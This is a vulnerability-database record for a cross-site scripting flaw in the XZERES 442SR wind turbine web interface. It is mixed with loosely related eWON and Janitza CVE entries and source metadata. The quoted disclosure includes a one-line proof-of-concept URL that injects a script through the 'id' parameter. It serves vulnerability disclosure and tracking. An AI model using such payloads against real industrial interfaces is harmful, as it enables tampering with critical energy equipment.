ID
VAR-E-201510-0004
CVE
cve_id: | CVE-2015-7925 | Trust: 1.4 |
cve_id: | CVE-2015-7926 | Trust: 0.8 |
cve_id: | CVE-2015-7929 | Trust: 0.8 |
cve_id: | CVE-2015-7927 | Trust: 0.8 |
cve_id: | CVE-2015-7928 | Trust: 0.8 |
cve_id: | CVE-2015-3970 | Trust: 0.3 |
cve_id: | CVE-2015-3967 | Trust: 0.3 |
cve_id: | CVE-2015-3969 | Trust: 0.3 |
cve_id: | CVE-2015-3968 | Trust: 0.3 |
cve_id: | CVE-2015-3973 | Trust: 0.3 |
cve_id: | CVE-2015-3971 | Trust: 0.3 |
cve_id: | CVE-2015-3972 | Trust: 0.3 |
cve_id: | CVE-2015-7924 | Trust: 0.3 |
TITLE
XZERES 442SR Wind Turbine XSS
Trust: 0.6
AFFECTED PRODUCTS
vendor: | ewon | model: | sa industrial router | scope: | - | version: | - | Trust: 0.6 |
vendor: | xzeres | model: | 442sr wind turbine | scope: | - | version: | - | Trust: 0.5 |
vendor: | ewon | model: | xss csrf session management rbac issues | scope: | eq | version: | /// | Trust: 0.5 |
vendor: | janitza | model: | umg | scope: | eq | version: | 6050 | Trust: 0.3 |
vendor: | janitza | model: | umg | scope: | eq | version: | 6040 | Trust: 0.3 |
vendor: | janitza | model: | umg | scope: | eq | version: | 5110 | Trust: 0.3 |
vendor: | janitza | model: | umg | scope: | eq | version: | 5090 | Trust: 0.3 |
vendor: | janitza | model: | umg | scope: | eq | version: | 5080 | Trust: 0.3 |
vendor: | ewon | model: | ewon | scope: | eq | version: | 0 | Trust: 0.3 |
vendor: | ewon | model: | 10.1s0 | scope: | ne | version: | - | Trust: 0.3 |
EXPLOIT
XZERES 442SR Wind Turbine Cross-site Scripting Vulnerability
*AFFECTED PRODUCTS*
XZERES is a US-based energy company that maintains offices in several
countries around the world, including the UK, Italy, Japan, Vietnam,
Philippines, and Myanmar.
The affected product, 442SR Wind Turbine, has a web-based interface system.
According to XZERES, the 442SR is deployed across the Energy sector. XZERES
estimates that this product is used worldwide.
*Reference*
https://ics-cert.us-cert.gov/advisories/ICSA-15-342-01
*Vulnerable parameter*
id
*PoC*
http://<IP>/details?object=Inverter&id=2<script>alert(xss-id-parameter")</script>
--
Best Regards,
Karn Ganeshen
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Input Validation Error
Trust: 0.6
TAGS
tag: | exploit | Trust: 1.0 |
tag: | xss | Trust: 1.0 |
tag: | vulnerability | Trust: 0.5 |
tag: | csrf | Trust: 0.5 |
EXTERNAL IDS
db: | ICS CERT | id: | ICSA-15-342-01 | Trust: 2.2 |
db: | NVD | id: | CVE-2015-7925 | Trust: 1.4 |
db: | NVD | id: | CVE-2015-7926 | Trust: 0.8 |
db: | NVD | id: | CVE-2015-7929 | Trust: 0.8 |
db: | NVD | id: | CVE-2015-7927 | Trust: 0.8 |
db: | NVD | id: | CVE-2015-7928 | Trust: 0.8 |
db: | ICS CERT | id: | ICSA-15-351-03 | Trust: 0.6 |
db: | EDBNET | id: | 82189 | Trust: 0.6 |
db: | EDBNET | id: | 82186 | Trust: 0.6 |
db: | 0DAYTODAY | id: | 24788 | Trust: 0.6 |
db: | EDBNET | id: | 24386 | Trust: 0.6 |
db: | PACKETSTORM | id: | 135067 | Trust: 0.5 |
db: | PACKETSTORM | id: | 135069 | Trust: 0.5 |
db: | ICS CERT | id: | ICSA-15-265-03 | Trust: 0.3 |
db: | NVD | id: | CVE-2015-3970 | Trust: 0.3 |
db: | NVD | id: | CVE-2015-3967 | Trust: 0.3 |
db: | NVD | id: | CVE-2015-3969 | Trust: 0.3 |
db: | NVD | id: | CVE-2015-3968 | Trust: 0.3 |
db: | NVD | id: | CVE-2015-3973 | Trust: 0.3 |
db: | NVD | id: | CVE-2015-3971 | Trust: 0.3 |
db: | NVD | id: | CVE-2015-3972 | Trust: 0.3 |
db: | BID | id: | 77291 | Trust: 0.3 |
db: | NVD | id: | CVE-2015-7924 | Trust: 0.3 |
db: | BID | id: | 79625 | Trust: 0.3 |
REFERENCES
url: | https://www.intelligentexploit.com | Trust: 1.2 |
url: | https://nvd.nist.gov/vuln/detail/cve-2015-7925 | Trust: 1.1 |
url: | https://ics-cert.us-cert.gov/advisories/icsa-15-351-03 | Trust: 0.6 |
url: | http://ewon.biz | Trust: 0.6 |
url: | https://0day.today/exploits/24788 | Trust: 0.6 |
url: | https://nvd.nist.gov/vuln/detail/cve-2015-7928 | Trust: 0.5 |
url: | https://nvd.nist.gov/vuln/detail/cve-2015-7927 | Trust: 0.5 |
url: | https://nvd.nist.gov/vuln/detail/cve-2015-7926 | Trust: 0.5 |
url: | https://nvd.nist.gov/vuln/detail/cve-2015-7929 | Trust: 0.5 |
url: | https://ics-cert.us-cert.gov/advisories/icsa-15-265-03 | Trust: 0.3 |
SOURCES
db: | BID | id: | 77291 |
db: | BID | id: | 79625 |
db: | PACKETSTORM | id: | 135067 |
db: | PACKETSTORM | id: | 135069 |
db: | EDBNET | id: | 82189 |
db: | EDBNET | id: | 82186 |
db: | EDBNET | id: | 24386 |
LAST UPDATE DATE
2022-07-27T09:47:19.903000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 77291 | date: | 2015-10-22T00:00:00 |
db: | BID | id: | 79625 | date: | 2015-12-17T00:00:00 |
SOURCES RELEASE DATE
db: | BID | id: | 77291 | date: | 2015-10-22T00:00:00 |
db: | BID | id: | 79625 | date: | 2015-12-17T00:00:00 |
db: | PACKETSTORM | id: | 135067 | date: | 2015-12-24T20:29:23 |
db: | PACKETSTORM | id: | 135069 | date: | 2015-12-24T20:35:19 |
db: | EDBNET | id: | 82189 | date: | 2015-12-24T00:00:00 |
db: | EDBNET | id: | 82186 | date: | 2015-12-24T00:00:00 |
db: | EDBNET | id: | 24386 | date: | 2015-12-28T00:00:00 |